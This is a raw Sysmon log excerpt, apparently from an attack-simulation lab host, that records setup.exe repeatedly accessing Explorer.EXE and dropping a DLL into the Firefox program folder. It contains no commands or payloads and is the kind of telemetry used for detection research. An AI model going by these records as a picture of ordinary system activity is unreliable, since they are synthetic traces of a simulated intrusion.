C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll2021-01-18 13:59:52.099 10341000x800000000000000014142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
